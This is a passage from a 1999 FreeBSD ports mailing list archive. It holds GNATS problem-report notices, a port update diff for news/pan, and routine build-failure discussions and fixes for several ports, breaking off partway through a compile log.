Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 02:31:46 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 2:34:43 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5375814F67; Tue, 14 Dec 1999 02:34:42 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA95621; Tue, 14 Dec 1999 02:34:42 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 02:34:42 -0800 (PST) From: Message-Id: <199912141034.CAA95621@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/12666: New port: kcd-4.7.10 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: kcd-4.7.10 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 02:32:57 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3: 7: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5039F14CC3; Tue, 14 Dec 1999 03:07:05 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA98453; Tue, 14 Dec 1999 03:07:04 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:07:04 -0800 (PST) From: Message-Id: <199912141107.DAA98453@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/12835: New port: libcgic-1.06 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: libcgic-1.06 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 02:35:14 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3: 8:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CBF6814FED; Tue, 14 Dec 1999 03:08:09 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA98554; Tue, 14 Dec 1999 03:08:09 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:08:09 -0800 (PST) From: Message-Id: <199912141108.DAA98554@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/13173: New port: yiff-0.33 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: yiff-0.33 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 03:07:27 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3: 9:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6256F15038; Tue, 14 Dec 1999 03:09:16 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA98703; Tue, 14 Dec 1999 03:09:16 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:09:16 -0800 (PST) From: Message-Id: <199912141109.DAA98703@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/13191: New port: fire-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: fire-1.0 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 03:08:23 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3:11:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 852D714C1A; Tue, 14 Dec 1999 03:11:22 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA99073; Tue, 14 Dec 1999 03:11:22 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:11:22 -0800 (PST) From: Message-Id: <199912141111.DAA99073@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/13251: New port: founts-11 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: founts-11 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 03:09:38 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3:13:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0920214EB7; Tue, 14 Dec 1999 03:13:12 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA99249; Tue, 14 Dec 1999 03:13:11 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:13:11 -0800 (PST) From: Message-Id: <199912141113.DAA99249@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/13267: New port: glasteroids-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: glasteroids-1.0 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 03:12:26 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3:14: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id C3B8515051; Tue, 14 Dec 1999 03:14:01 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 6BDFF1C2B; Tue, 14 Dec 1999 06:13:47 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 68191381B; Tue, 14 Dec 1999 06:13:47 -0500 (EST) Date: Tue, 14 Dec 1999 06:13:47 -0500 (EST) From: Bill Fumerola To: andy@FreeBSD.org Cc: ports@FreeBSD.org Subject: Re: ports/13251: New port: founts-11 In-Reply-To: <199912141111.DAA99073@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 14 Dec 1999 andy@FreeBSD.org wrote: > Responsible-Changed-From-To: andy->ports Traditionally, these should have all been 'freebsd-ports', I don't know if it's really a big deal though. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3:14:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A90D815051; Tue, 14 Dec 1999 03:14:17 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA99373; Tue, 14 Dec 1999 03:14:17 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:14:17 -0800 (PST) From: Message-Id: <199912141114.DAA99373@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/13291: New port: xap-xwf-0.7.8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xap-xwf-0.7.8 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 03:13:28 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 3:15:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C7E1150AE; Tue, 14 Dec 1999 03:15:16 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA99498; Tue, 14 Dec 1999 03:15:15 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 03:15:15 -0800 (PST) From: Message-Id: <199912141115.DAA99498@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/13541: New port: chpp-0.3.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: chpp-0.3.5 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 03:14:30 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 4:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7AC1A1514F for ; Tue, 14 Dec 1999 04:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA07745; Tue, 14 Dec 1999 04:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id DDF6614BC2; Tue, 14 Dec 1999 04:34:05 -0800 (PST) Message-Id: <19991214123405.DDF6614BC2@hub.freebsd.org> Date: Tue, 14 Dec 1999 04:34:05 -0800 (PST) From: jay.krell@cornell.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15481: ports/devel/codecrusader slightly broken Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15481 >Category: ports >Synopsis: ports/devel/codecrusader slightly broken >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 04:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jay krell >Release: 3.4 >Organization: >Environment: FreeBSD jayk-home1bsd 3.4-RC FreeBSD 3.4-RC #0: Mon Dec 13 14:24:45 PST 1999 jayk@jayk-home1bsd:/usr/src/sys/compile/JAYK1 i386 >Description: ports/devel/codecrusader doesn't build out of the box. >How-To-Repeat: su cd /usr/ports/devel/codecrusader make >Fix: I have applied two fixes so far: ; Makefile is generated, I didn't check if the deps are ; right, just deleted it; error appears at line 172 ; of Makefile cd /usr/ports/devel/codecrusader/work/JX* rm programs/code_crusader/Makefile line 168 of programs/code_crusader/Make.header replace tab and space at start of line with just a tab ln -s /usr/X11R6/include/X11 /usr/include/X11 (probably ln -s /usr/X11R6/include/X11 usr/local/include/X11 would work) cd /usr/ports/devel/codecrusader make >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 5:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A70D715181 for ; Tue, 14 Dec 1999 05:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA10508; Tue, 14 Dec 1999 05:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id F299D151D3 for ; Tue, 14 Dec 1999 05:18:45 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 044B79B1C; Tue, 14 Dec 1999 08:18:43 -0500 (EST) Message-Id: <19991214131843.044B79B1C@pawn.primelocation.net> Date: Tue, 14 Dec 1999 08:18:43 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15482: Update port: news/pan Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15482 >Category: ports >Synopsis: Update port: news/pan >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 05:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 * Added de translation * Various bug fixes * Add patch-ad, ae, and af. >Description: Update port: news/pan >How-To-Repeat: >Fix: diff -urN pan.old/Makefile pan/Makefile --- pan.old/Makefile Sat Dec 4 18:32:51 1999 +++ pan/Makefile Mon Dec 13 17:16:41 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: pan -# Version required: 0.6.5 +# Version required: 0.6.6 # Date created: 07 August 1999 # Whom: Chris D. Faulhaber # # $FreeBSD: ports/news/pan/Makefile,v 1.10 1999/12/04 23:32:51 cpiazza Exp $ # -DISTNAME= pan-0.6.5 +DISTNAME= pan-0.6.6 CATEGORIES= news gnome MASTER_SITES= ftp://source.rebelbase.com/pub/pan/ diff -urN pan.old/files/md5 pan/files/md5 --- pan.old/files/md5 Fri Dec 10 12:21:15 1999 +++ pan/files/md5 Mon Dec 13 17:16:57 1999 @@ -1 +1 @@ -MD5 (pan-0.6.5.tar.bz2) = 2c238b03b0d25d031c52191cde42ac9f +MD5 (pan-0.6.6.tar.bz2) = f4672603fe7c6b4009fb99bd95347680 diff -urN pan.old/patches/patch-ad pan/patches/patch-ad --- pan.old/patches/patch-ad Wed Dec 31 19:00:00 1969 +++ pan/patches/patch-ad Mon Dec 13 17:11:27 1999 @@ -0,0 +1,13 @@ +--- pan/gui.h.orig Sun Dec 12 01:06:10 1999 ++++ pan/gui.h Mon Dec 13 17:04:30 1999 +@@ -21,6 +21,10 @@ + #ifndef __GUI_H__ + #define __GUI_H__ + ++#if defined(__FreeBSD__) ++#define ulong u_long ++#endif ++ + extern GtkWidget *appbar; + + extern GtkWidget *infobar; diff -urN pan.old/patches/patch-ae pan/patches/patch-ae --- pan.old/patches/patch-ae Wed Dec 31 19:00:00 1969 +++ pan/patches/patch-ae Mon Dec 13 17:10:00 1999 @@ -0,0 +1,11 @@ +--- uulib/Makefile.in.orig Mon Dec 13 14:09:45 1999 ++++ uulib/Makefile.in Mon Dec 13 17:08:46 1999 +@@ -115,7 +115,7 @@ + libuu_a_LIBADD = uulib.o uucheck.o uunconc.o uuutil.o uuencode.o uuscan.o uustring.o fptools.o + + +-CFLAGS = -O2 ++CFLAGS = @CFLAGS@ + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs + CONFIG_HEADER = ../config.h + CONFIG_CLEAN_FILES = diff -urN pan.old/patches/patch-af pan/patches/patch-af --- pan.old/patches/patch-af Wed Dec 31 19:00:00 1969 +++ pan/patches/patch-af Mon Dec 13 17:19:41 1999 @@ -0,0 +1,11 @@ +--- rx/Makefile.in.orig Mon Dec 13 14:09:45 1999 ++++ rx/Makefile.in Mon Dec 13 17:19:26 1999 +@@ -115,7 +115,7 @@ + noinst_HEADERS = _rx.h rx.h rxanal.h rxbasic.h rxbitset.h rxcontext.h rxcset.h rxgnucomp.h rxhash.h rxnfa.h rxnode.h inst-rxposix.h rxposix.h rxproto.h rxsimp.h rxspencer.h rxstr.h rxsuper.h rxunfa.h rxall.h + + +-CFLAGS = -O2 ++CFLAGS = @CFLAGS@ + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs + CONFIG_HEADER = ../config.h + CONFIG_CLEAN_FILES = diff -urN pan.old/pkg/PLIST pan/pkg/PLIST --- pan.old/pkg/PLIST Tue Nov 30 13:48:06 1999 +++ pan/pkg/PLIST Mon Dec 13 17:23:47 1999 @@ -1,5 +1,6 @@ bin/pan share/locale/da/LC_MESSAGES/pan.mo +share/locale/de/LC_MESSAGES/pan.mo share/locale/es/LC_MESSAGES/pan.mo share/locale/it/LC_MESSAGES/pan.mo share/locale/ja/LC_MESSAGES/pan.mo >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 6:50:33 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viking.sophos.com (viking.sophos.com [193.82.145.128]) by hub.freebsd.org (Postfix) with ESMTP id C999B14C3D; Tue, 14 Dec 1999 06:50:30 -0800 (PST) (envelope-from tmb@tyne.sophos.com) Received: from tyne.sophos.com (tyne.sophos.com [193.82.145.132]) by viking.sophos.com (MAILER-DAEMON) with ESMTP id 71F8545C2C; Tue, 14 Dec 1999 14:50:28 +0000 (GMT) Received: (from tmb@localhost) by tyne.sophos.com (8.9.3/8.9.3) id OAA45883; Tue, 14 Dec 1999 14:50:27 GMT (envelope-from tmb) Date: Tue, 14 Dec 1999 14:50:27 +0000 From: Mark Blackman To: dwhite@freebsd.org Cc: freebsd-ports@freebsd.org Subject: Re: ports/15476: ssh 1.2.27 port BROKEN: patch-ac does not apply Message-ID: <19991214145027.A45855@sophos.com> References: <19991214074903.8688415335@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <19991214074903.8688415335@hub.freebsd.org>; from dwhite@freebsd.org on Mon, Dec 13, 1999 at 11:49:03PM -0800 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The rsaref patch-ac problem is just the whitespace issue. note the problem is *only* in the rsaref port. If you use 'patch -l' everything is hunky dorey. I'd commit this but... On Mon, Dec 13, 1999 at 11:49:03PM -0800, dwhite@freebsd.org wrote: > >Description: > The patch for the RSA overflow does not apply to the rsaref sources. > > If you try to build the port it dies during rsaref: > > ===> ssh-1.2.27 depends on file: /nonexistent - not found > ===> Verifying extract for /nonexistent in /usr/ports/security/rsaref > ===> Extracting for rsaref-2.0 > >Release-Note: > >Audit-Trail: > >Unformatted: > >> Checksum OK for rsaref20.1996.tar.Z. > ===> Returning to build of ssh-1.2.27 > ===> ssh-1.2.27 depends on shared library: rsaref.2 - not found > ===> Verifying install for rsaref.2 in /usr/ports/security/rsaref > ===> Patching for rsaref-2.0 > ===> Applying FreeBSD patches for rsaref-2.0 > 4 out of 4 hunks failed--saving rejects to rsa.c.rej > *** Error code 4 -- Mark Blackman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 8:42:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from shadowmere.student.utwente.nl (wit401305.student.utwente.nl [130.89.236.145]) by hub.freebsd.org (Postfix) with ESMTP id 8D741151EB for ; Tue, 14 Dec 1999 08:42:36 -0800 (PST) (envelope-from daeron@Wit401305.student.utwente.nl) Received: by shadowmere.student.utwente.nl (Postfix, from userid 1000) id E8D921FC4; Tue, 14 Dec 1999 17:42:30 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by shadowmere.student.utwente.nl (Postfix) with ESMTP id C4C11DE for ; Tue, 14 Dec 1999 17:42:30 +0100 (CET) Date: Tue, 14 Dec 1999 17:42:30 +0100 (CET) From: Pascal Hofstee To: freebsd-ports@freebsd.org Subject: configure problems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I have noticed some weird problems lately when running configure-scripts. E.g. when trying to build the gtk12-port configure just hangs waiting for "conftest" to finish (which never seems to do so). I have noticed similair problems with other configure checks (e.g. SDL). Is this a known issue and/or is there any way to solve this problem ? This is on a FreeBSD-current system as of last night. (Noticed the problem occuring for several days now) -------------------- Pascal Hofstee - daeron@shadowmere.student.utwente.nl -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GCS d- s+: a-- C++ UB++++ P+ L- E--- W- N+ o? K- w--- O? M V? PS+ PE Y-- PGP-- t+ 5 X-- R tv+ b+ DI D- G e* h+ r- y+ ------END GEEK CODE BLOCK------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 9:41:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id ADE9A151B9 for ; Tue, 14 Dec 1999 09:41:37 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id LAA23630; Tue, 14 Dec 1999 11:41:23 -0600 (CST) Date: Tue, 14 Dec 1999 11:41:22 -0600 (CST) From: Steve Price To: Pascal Hofstee Cc: freebsd-ports@FreeBSD.ORG Subject: Re: configure problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 14 Dec 1999, Pascal Hofstee wrote: # I have noticed some weird problems lately when running configure-scripts. # E.g. when trying to build the gtk12-port configure just hangs waiting for # "conftest" to finish (which never seems to do so). I have noticed # similair problems with other configure checks (e.g. SDL). # # Is this a known issue and/or is there any way to solve this problem ? I am seeing similar problems here. Try removing '-pipe' from your CFLAGS in /etc/make.conf and see if you still get the same results. -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 11:10:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5C04815044 for ; Tue, 14 Dec 1999 11:10:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA96924; Tue, 14 Dec 1999 11:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 722C515156; Tue, 14 Dec 1999 11:06:18 -0800 (PST) Message-Id: <19991214190618.722C515156@hub.freebsd.org> Date: Tue, 14 Dec 1999 11:06:18 -0800 (PST) From: Kotchourko@iket.fzk.de To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15484: 'make test' crashes in math/netcdf Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15484 >Category: ports >Synopsis: 'make test' crashes in math/netcdf >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 11:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kotchourko >Release: 3.4-RC >Organization: Forschungszentrum Karlsruhe >Environment: FreeBSD inrh2b.fzk.de 3.4-RC FreeBSD 3.4-RC #91: Tue Dec 14 03:26:10 CET 1999 root@inrh2b.fzk.de:/usr/src/sys/compile/INRKOC i386 >Description: After installation of port 'math/netcdf' the attempt to 'make test' (how it is recomended in 'INSTALL') crashes >How-To-Repeat: cd math/netcdf make install cd work/netcdf-3.5/src make test >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 13: 0:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 44A7514C0F for ; Tue, 14 Dec 1999 13:00:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA08646; Tue, 14 Dec 1999 13:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 13:00:03 -0800 (PST) Message-Id: <199912142100.NAA08646@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "R. Imura" Subject: Re: ports/15434: new port: devel/kdevelop Reply-To: "R. Imura" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15434; it has been noted by GNATS. From: "R. Imura" To: andrews@technologist.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: ports/15434: new port: devel/kdevelop Date: Wed, 15 Dec 1999 05:53:05 +0900 > The long-awaited kdevelop port. I would like to > request that R. Imura review this port, if at all > possible. o The port depends on many other ports. Year, if they are installed, kdevelop will be more power-full and we will be happy, but they are not really **nessesary**. How about showing these ports by pkg/MESSAGE to recommend people to install? o If you say it is BROKEN for -stable( < 400004), defining USE_NEWGCC doesn't make any sense. (I know it may have a sence in the future.) I thought it being funny. The port seems almost fine =) --- R. Imura To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 13:36:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from typhoon.mail.pipex.net (typhoon.mail.pipex.net [158.43.128.27]) by hub.freebsd.org (Postfix) with SMTP id BF57214F85 for ; Tue, 14 Dec 1999 13:36:35 -0800 (PST) (envelope-from mark@dogma.freebsd-uk.eu.org) Received: (qmail 20093 invoked from network); 14 Dec 1999 21:36:32 -0000 Received: from useraf49.uk.uudial.com (HELO marder-1.) (62.188.132.36) by smtp.dial.pipex.com with SMTP; 14 Dec 1999 21:36:32 -0000 Received: (from mark@localhost) by marder-1. (8.9.3/8.8.8) id VAA04010 for ports@freebsd.org; Tue, 14 Dec 1999 21:36:35 GMT (envelope-from mark) Date: Tue, 14 Dec 1999 21:36:35 +0000 From: Mark Ovens To: ports@freebsd.org Subject: glclock port broken? Message-ID: <19991214213635.D339@marder-1> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i Organization: Total lack of Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just tried to build glclock from the ports (ports tree cvsup'd 10 minutes ago) and it fails at the link stage. Can anyone tell me what's wrong? 3.3-STABLE (as of the end of Sept.) and XFree 3.3.5. marder-1# make ===> Extracting for glclock-5.0 >> Checksum OK for glclock-5.0.tar.gz. ===> glclock-5.0 depends on shared library: GL.14 - found ===> glclock-5.0 depends on shared library: X11.6 - found ===> Patching for glclock-5.0 ===> Applying FreeBSD patches for glclock-5.0 ===> Configuring for glclock-5.0 ===> Building for glclock-5.0 c++ -O -pipe -w -DGLCLOCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -O -pipe -w -DGLCL OCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -fexpensive-optimizations -ffast-math - fomit-frame-pointer -fforce-mem -fforce-addr -c -I/usr/X11R6/include -c glclock. cpp c++ -O -pipe -w -DGLCLOCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -O -pipe -w -DGLCL OCK_DIR=\"/usr/X11R6/lib/X11/glclock/\" -fexpensive-optimizations -ffast-math - fomit-frame-pointer -fforce-mem -fforce-addr -c -I/usr/X11R6/include -c 